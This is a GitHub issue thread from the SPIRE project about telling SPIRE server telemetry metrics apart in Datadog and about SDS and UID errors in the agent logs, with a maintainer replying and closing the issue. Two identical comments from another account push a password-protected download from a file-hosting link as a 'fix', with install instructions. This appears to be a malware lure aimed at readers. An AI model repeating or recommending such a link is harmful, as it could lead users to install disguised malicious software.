### ISSUE TITLE
Spire - DD integration issues

### ISSUE THREAD

**Issue by Kathiresan1201** [spiffe/spire#5434]
Hi Team, I have recently upgraded to 1.8.11 and  configured spire server and agent telemetry with below configuration. I’m able to see the metrics of spire agents without any issues, however spire server labels are not showing since I’m ingesting couple of spire environment logs/metrics into the same DD instance? anyway to uniquely identify spire server metrics?

<img width="801" alt="Screenshot 2024-08-27 at 10 00 42 AM" src="https://github.com/user-attachments/assets/4e7d99da-aae1-4931-a3c7-227f0fae2f8c">

<img width="1022" alt="image" src="https://github.com/user-attachments/assets/d0d79d53-421e-406d-bc38-e057bfe3b83a">

#2 Couple of entries of SDS.V3 captured as service in the agent logs with errors(error:null, received error from Stream secrets server), UID 1000 no user found, I’m using same image from the tag.
Could you help with the issues please?

<img width="1016" alt="image" src="https://github.com/user-attachments/assets/31e7cc44-32d2-4860-8560-1521802aca99">

note: the spire agent is not configured with unix workload attestor.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amartinezfayo** [comment]
Thank you @Kathiresan1201 for opening the issue.
>note: the spire agent is not configured with unix workload attestor.

The logs are suggesting that the agent was loaded with the unix workload attestor. Maybe the configuration changed after it was loaded? Have you tried restarting the agent?
If you already restarted the agent and still see this error, could you share the `plugins` section of the agent configuration?
Thanks.

**Comment by amartinezfayo** [comment]
Hi @Kathiresan1201 did you have a chance to look at my previous comment? Is this still an issue?

**Comment by amartinezfayo** [comment]
I'll go ahead and close this issue. Please re-open if needed.
